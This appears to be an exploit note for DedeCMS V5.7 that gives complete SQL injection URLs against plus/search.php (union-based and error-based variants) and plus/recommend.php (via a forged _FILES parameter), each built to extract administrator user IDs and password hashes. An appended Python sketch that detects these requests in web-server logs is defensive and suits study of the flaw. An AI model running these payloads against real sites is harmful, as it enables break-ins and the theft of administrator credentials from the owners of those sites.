dedecms

V5.7

plus/search.php injection

0x1:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

If the error returned is: Safe Alert: Request Error step 2 !

then use the following exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111=@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`#@__admin`#@`\'`+]=a

0x2:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

If the error returned is: Safe Alert: Request Error step 1 !

then use the following exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111=@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`#@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)#@`\'`+]=a

plus/recommend.php injection

http://www.nxadmin.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
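
Detection sketch, added here as an example (not part of the original page and not DedeCMS code): it scans web-server access logs for the two request shapes shown above, a `typeArr` parameter whose array key is not a plain number and a `_FILES[...]` value arriving as a request parameter. The log lines are constructed, and treating only `typeArr[<digits>]` as legitimate is an assumption; `_FILES` is flagged on any path, which goes beyond the single script shown.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate typeArr parameter looks like typeArr[<digits>].
TYPEARR_OK = re.compile(r"^typeArr\[\d+\]$")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, shortened values).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /plus/search.php?keyword=as&typeArr[1]=news HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /plus/search.php?keyword=as&typeArr[%20uNion%20]=a HTTP/1.1" 200 312',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /plus/search.php?keyword=as&typeArr[111=x]=a HTTP/1.1" 200 312',
    '198.51.100.9 - - [01/Jan/2024:10:00:14 +0000] "GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=x&_FILES[type][name]=1.jpg HTTP/1.1" 200 900',
]

def check_request(target):
    """Return the reasons a request target resembles the requests on this page."""
    parts = urlsplit(target)
    reasons = set()
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl cuts the name at the first '=', so a key such as
        # typeArr[111=...] arrives as 'typeArr[111' and fails the full match.
        if parts.path.lower().endswith("/plus/search.php") and name.startswith("typeArr"):
            if not TYPEARR_OK.match(name):
                reasons.add("non-numeric typeArr key")
        # Upload metadata is built by PHP itself; it should never be a parameter.
        if name == "_FILES" or name.startswith("_FILES["):
            reasons.add("_FILES passed as a request parameter")
    return sorted(reasons)

def scan_log(lines):
    """Return (line_index, reasons) for every log line that is flagged."""
    hits = []
    for index, line in enumerate(lines):
        match = REQUEST_RE.search(line)
        if match:
            reasons = check_request(match.group(1))
            if reasons:
                hits.append((index, reasons))
    return hits

if __name__ == "__main__":
    for index, reasons in scan_log(SAMPLE_LOG):
        print(index, ", ".join(reasons))
```

The same two conditions can be expressed as WAF or reverse-proxy deny rules in front of `/plus/`.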